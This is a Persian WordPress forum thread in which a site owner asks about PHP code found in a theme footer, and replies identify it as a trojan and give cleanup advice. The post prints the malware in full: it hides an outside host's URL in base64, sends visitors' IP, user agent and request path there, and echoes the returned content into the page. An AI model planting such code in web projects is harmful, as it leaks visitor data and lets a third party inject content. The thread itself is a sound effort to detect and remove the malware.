M.Hajloo

کمک برای شناسایی یک کد در فوتر قالب

6 پست در این موضوع قرار دارد

درود

دوستان 1 کد توی فوتر قالب من وجود داره که نمیدونم کارش چی هست و اصلاً آیا بهش نیاز هست یا خیر

ممنون میشم 1 توضیحی بدید تا متوجه بشم کار این کد چیه :


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}

0

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

3

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

0

به اشتراک گذاری این پست


لینک به پست

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

کد می تونه از یک افزونه هم انتقال پیدا کنه

هر فایلی می تونه مخرب باشه و دستور کپی یک تکه کد را روی یکی از برگه های قالب جاری بعد یا قبل از تگی مثل فوتر بده اگر باز هم همین مورد تکرار شد تگ فوتر را از قالب حذف کنید و تست بگیرید اگر مورد هم دیگه تکرار نشد بگردید دنبال افزونه ای که این کدها رو توش داشته باشه

4

به اشتراک گذاری این پست


لینک به پست

نه به قالب اختصاصی مربوط نمیشه چون این کد برای یک ایرانی نیست و نویسنده این تروجان یک غیر ایرانی هستش

این کد قبلن هم در انجمن یادمه توسط چند تا یوزر دیگه گذارش شده بود که خود به خود اضافه میشه

اونموقع تحقیق که کردم این یک تروجان هست که توی ویندوز وجود داره و اگر شما به وسیله ftp به هاست متصل بشی یا از آپلود سی پنل فایلی آپلود کنی ، به صورت خودکار این کد مخرب رو توی 3 فایل اصلی index.php & header.php & footer.php اضافه میکنه و اگر فایل رو دیکد کنی میبینی که اطلاعات بازدید کننده هارو دریافت میکنه و به یک آمارگیر خارجی میفرسته

مشکل خاصی نداره این کد اما با اینکه برای ربات های گوگل شرط گذاشته اما بازم گوگل میفهمه و سایت شمارو بلاک میکنه به عنوان مخرب

برای حل این مشکل :

سیستمت رو 100% پاکسازی کن و بعد برو به سی پنل و همه فایل های مشکوک رو پاک کن و بعد این کد رو از داخل همه فایل ها که همشونم اول فایل گذاشته شدرو پاک کن

اگر کارهارو درست انجام داده باشی دیگه کدی اضافه نمیشه

5

به اشتراک گذاری این پست


لینک به پست

ممنون از راهنمائی مفیدتون

سیستم را با آخرین آپدیت نود اسکن کردم مشکلی نبود

هاست را هم به وسیله آنتی ویروسش اسکن کردم که خدا را شکر چیزی نبود

چند روز پیش چند تا افزونه مثل پخش آنلاین موزیک و ... تست کردم که فکر کنم از روی همین ها اضافه شده بوده

این کد هم فقط تو فایل فوتر وجود داشت که حذف کردم

*سپاس*

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط ghasem47
      سلام به همه ی دوستان عزیز
      من در نظر دارم که یک وبسایت برای فروش فایل هایی مربوط به وب راه اندازی کنم .و قصد من این است که علاوه بر فروش فایل در سایت ، هاست و دامنه نیز بفروشم . و همچنین این هم مهمه که کاربر برای خرید هاست و یا دامین باید در وبسایت عضو بشه و بعد از خرید نیز بتونه اطلاعات هاست و تنظیمات هاست رو از حساب کاربریش در وبسایت من انجام بده.
      مانند این وبسایت : (سایت ساز زرین )   https://sitesazz.ir/
      اما تنها مشکل و مسئله در این جاست که من نمی دونم و بلد نیستم که باید چگونه این کار رو انجام بدم؟
      من قراره که وبسایت رو با وردپرس راه اندازی کنم ولی نمی دونم چطوری باید این امکان فروش هاست رو به وبسایت اضافه کنم و کاری کنم که در وبسایت بتونم هاست و دامنه هم بفروشم و به علاوه این مسئله هم هست که باید کاربرا بتونن از حساب کاربری داخل وبسایتشون به تنظیمات هاست و یا دامنشون دسترسی پیدا کنند.
      لطفاً منو راهنمایی کنید.
      با تشکر
    • توسط iranibonsai
      درود، سایتی رو با وردپرس بالا آوردیم
      اما اکنون در صفحات داخلی سایت کد خطایی رو در بخش بالای مرورگر نشون میده که نتونستیم رفعش کنیم
      Warning: count(): Parameter must be an array or an object that implements Countable in /home3/zahrefzo/public_html/wp-includes/post-template.php on line 284
      این خطا قبلا وجود نداشت، نفهمیدم به چه علتی بوجود آمده و تو اینترنت هم چیز خاصی راجعبه رفعش پیدا نکردم، ممنون میشم اعلام نظر بفرمایید
      آدرس سایت :
      http://minelbeautysalon.com//
    • توسط sydvza
      باسلام ببخشید من کلیدواژه دکه را انتخاب کردم ولی در سرچ گوگل کلمه دکه وارد میکنم حتی جز 10 صفحه هم نیستم
      https://dackeh.com
    • توسط MajidRB
      سلام وقتتون بخیر.
      دوستان قالب placid رو به صورت های مختلف دانلود و نصب کردم ( هم از سایت های فارسی و قالب فارسی شده هم از منابع خود وردپرس)
      چه به شکل فارسی چه به شکل انگلیسی پست ها رو اونطوری که در پیش نمایش قالب نشان داده شده ، در صفحه اصلی نشان نمیده !
      عکس ها رو درج میکنم
      هیچ تنظیماتی نمانده که من دستکاری نکرده باشم
      فکر کنم باید چند خط کد کم یا زیاد بشه ( که بلد نیستم ! )
      خیلی ممنون میشم راهنمایی کنید
       


    • توسط nnmmss
      با سلام
       
      من اصلا وردپرس بلد نيستم ولي مجبورم كه سايتي را نگهداري كنم. در اين سايت وقتي وارد بعضي صفحات ميشوم عبارت "دسته" به انتهاي عنوان اضافه شده.  اين صفحات بعنوان "دسته" در فهرست انتخاب شده اند. مثلا
      من در منو مورد 
      آرشيو   
      را دارم كه زير مجموعه آن 
      آرشيو سال 97
      آرشيو سال 96
      آرشيو سال 95
      هست.
       
      من "آرشيو" بعنوان برگه انتخاب شده و آرشيو سال 97 - 96 - 95 به صورت دسته انتخاب شده است. وقتي من روي هر كدام از آرشيو سال 97 يا 96 يا ..... ميروم عنوان صفحه به صورت زير است
      آرشیو سال 97دسته
      اين عبارت دسته از كجا ميايد؟ و من چگونه ميتوانم آنرا حذف كنم؟
      با تشكر